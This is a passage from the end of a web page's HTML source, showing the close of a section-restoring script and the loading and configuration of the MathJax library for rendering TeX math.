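      restored += 1;
    }
  }
  return restored;
}
restoreOpenSections();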
</script>
<script async src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-AMS-MML_HTMLorMML" type="text/javascript"></script>
<script type="text/x-mathjax-config">
// MathJax 2.x configuration (the loader is the async MathJax.js script tag above):
// TeX input, HTML-CSS or native MathML output, context menu and zoom extensions.
const mathjaxConfig = {
  config: ["MMLorHTML.js"],
  jax: ["input/TeX", "output/HTML-CSS", "output/NativeMML"],
  extensions: ["MathMenu.js", "MathZoom.js"]
};
MathJax.Hub.Config(mathjaxConfig);
</script>
</body>
</html>